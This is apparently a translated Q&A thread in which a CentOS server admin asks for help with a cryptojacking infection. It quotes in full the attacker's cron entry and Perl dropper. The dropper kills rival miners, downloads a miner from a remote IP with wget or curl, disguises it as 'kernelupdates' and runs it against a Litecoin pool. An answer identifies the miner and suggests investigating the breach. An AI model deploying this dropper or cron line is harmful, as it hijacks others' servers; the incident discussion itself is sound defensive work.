那些遇到过的问题

./kernelupdates 100% cpu 使用率

Vai*_*and 5 centos wordpress centos6 apache-2.2

我有一个运行一些 wordpress 和 tomcat 网站的 CENTOS6 服务器。这两天一直在崩溃。经过调查,我们发现内核更新二进制文件在服务器上消耗了 100% 的 CPU。过程如下。

./kernelupdates -B -o stratum+tcp://hk2.wemineltc.com:80 -u spdrman.9 -p passxxx
Run Code Online (Sandbox Code Playgroud)

但是这个进程内核更新好像无效。可能是服务器被破坏了,这个进程是由黑客安装的,所以我杀死了这个进程并删除了 apache 用户的 cron 条目。

但不知何故,这个过程在几个小时后又开始了,cron 条目也恢复了,我正在寻找修改 cron 作业的东西。

  1. 这个过程属于挖矿过程吗?
  2. 我们怎样才能停止 cronjob 修改并清理这个过程的源头?

Cron 入口(apache 用户)

/6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-web.com/.../abc.txt;perl abc.txt;rm -f abc*
Run Code Online (Sandbox Code Playgroud)

abc.txt

#!/usr/bin/perl
system("killall -9 minerd");
system("killall -9 PWNEDa");
system("killall -9 PWNEDb");
system("killall -9 PWNEDc");
system("killall -9 PWNEDd");
system("killall -9 PWNEDe");
system("killall -9 PWNEDg");
system("killall -9 PWNEDm");
system("killall -9 minerd64");
system("killall -9 minerd32");
system("killall -9 named");
$rn=1;
$ar=`uname -m`;
while($rn==1 || $rn==0) {
$rn=int(rand(11));
}
$exists=`ls /tmp/.ice-unix`;
$cratch=`ps aux | grep -v grep | grep kernelupdates`;
if($cratch=~/kernelupdates/gi) { die; }
if($exists!~/minerd/gi && $exists!~/kernelupdates/gi) {
$wig=`wget --version | grep GNU`;
if(length($wig>6)) {
if($ar=~/64/g) {
system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;wget http://5.104.106.190/64.tar.gz;tar xzvf 64.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates");
} else {
system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;wget http://5.104.106.190/32.tar.gz;tar xzvf 32.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates");
}
} else {
if($ar=~/64/g) {
system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;curl -O http://5.104.106.190/64.tar.gz;tar xzvf 64.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates");
} else {
system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;curl -O http://5.104.106.190/32.tar.gz;tar xzvf 32.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates");
}
}
}

@prts=('8332','9091','1121','7332','6332','1332','9333','2961','8382','8332','9091','1121','7332','6332','1332','9333','2961','8382');
$prt=0;
while(length($prt)<4) { $prt=$prts[int(rand(19))-1]; }
print "setup for $rn:$prt done :-)\n";
system("cd /tmp/.ice-unix;./kernelupdates -B -o stratum+tcp://hk2.wemineltc.com:80 -u spdrman.".$rn." -p passxxx &");
print "done!\n";
Run Code Online (Sandbox Code Playgroud)

Izz*_*zzy 8

这个过程是一个莱特币(另一种加密货币)矿工过程。有权访问您服务器的人正在使用您的服务器生成莱特币(= 赚钱)。这个kernelupdates名字很可能只是让你感到困惑。

在您删除任何内容之前,我建议您备份您拥有的所有内容并找出这些内容是如何放入您的服务器的。如果您删除它但不删除安全问题,它很可能会再次出现。我敢打赌 Wordpress 或一些过时的插件会造成安全漏洞。

在找到并修复安全问题后,尝试在系统日志中查看您的 cron 日志。这可能会给您指示如何插入 cronjob。

归档时间:

查看次数:

3251 次

最近记录:

11 年,8 月 前
相关归档
使用mod_proxy对SOAP服务做反向代理时出现间歇性错误 21
如何在 Ubuntu 上为 PHP 安装/启用 GMP(数学函数)? 18
共享点替换 10
断电后如何检查 CentOS 6 Server VM Host? 8
EC2 FileZilla 登录正常但没有写入或删除权限 4
如何在每个月的第二天到最后一天安排 Cron 作业 4
CentOS 5下cron作业的小数小时? 3
Apache:基于URL后缀的代理 3
服务器重启后启动应用程序 1
现有文件夹的 Chroot 用户女巫父所有者不是 root 1
难疑归档
如何在不删除图像本身的情况下删除 Docker 中的图像标签? 213
linux上的文件名长度限制? 147
如何防止警告 No xauth data; 使用伪造的身份验证数据进行 X11 转发? 96
我需要在防火墙中打开哪些端口才能使用 NFS? 94
如何在 Debian 上列出我的开放端口? 74
FreeNAS 可靠吗? 70
如何使用 iptables PREPEND 规则而不是 APPEND? 67
如何使用反向代理正确处理相对 url 66
如何每天在特定时间运行 cron 作业? 62
如何确定 Linux 上 ext3 分区的块大小? 55